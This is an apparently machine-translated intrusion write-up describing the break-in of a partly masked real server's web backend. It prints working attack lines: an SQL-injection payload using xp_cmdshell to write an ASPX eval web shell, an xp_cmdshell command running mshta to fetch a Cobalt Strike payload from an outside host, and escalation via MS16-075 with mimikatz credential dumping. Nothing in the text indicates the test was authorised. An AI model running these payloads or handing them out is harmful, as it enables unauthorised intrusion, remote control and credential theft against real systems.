All I got was a backend website, first of all, it was information collection. Check it on the cyberspace security search engine fofa, and then port scanning, and skip the ports that are valuable: 80,81,1433,3389.
Vulnerability: http://49.xxx.xx.xxx:81/ Login/index
SQL injection post package (get ASP.NET+Microsoft-IIS/7.5 in the response package)
permission: SA
just got injected and wanted to enter the background to check it out, and then I had a py script for a while, forgive me CAI
Get the password and enter the background, the template is the same, there is no data backup, no template modification, upload personal judgment based on the white list, there is an editor but the sample code has been deleted, and the message board cannot leave messages. Looking back and looking at the injection, since it is stacked injection, then You can execute the SQL statement, and then have a meal, um um um... There is no response, the code is as follows: I
thought it was over here, but I didn’t expect the login on port 3389 failed, the connection failed on port 1433, here I am very confused, after the boss’s For some guidance, there is no echo of stack injection. At this time, you can ping the following dnslog. Fortunately
, you made it up a few days ago: Since the dnslog has an echo, it proves that the xp_cmdshel extension is enabled and you can execute commands. Here are the
first two ideas Is the cmd execution command, output to the root directory of the website
';exec master…xp_cmdshell'echo ^<%@ Page Language="Jscript"% > <%eval(Request.Item["pass"],"unsafe");%^ >> c:\website path\shell.aspx';-
I used the second method because I couldn't get the absolute path
The second is to download the Trojan horse, run the Trojan horse and go directly to the
cs to set up the listener, generate an html application file, and upload it to the cs server.
Execute at the injection point
'; exec master.dbo.xp_cmdshell'mshta http://39.xx .xxx.xxx:80/download/file.ext';-
A host will go online in a while.
Set the beacon reconnection time, and there is no domain
patch to install more than 200, more, compare the information vulnerabilities in systeminfo, see Is there any omission, and found an exploitable vulnerability ms16-075
systeminfo | findstr KB3164038
https://github.com/vysecurity/reflectivepotato.git The cna plug-in of the exp on github, loaded into the script manager,
here should not be directly created management As a member, mimikatz should read the hash or SSP to obtain the plaintext password. So far, the test is over.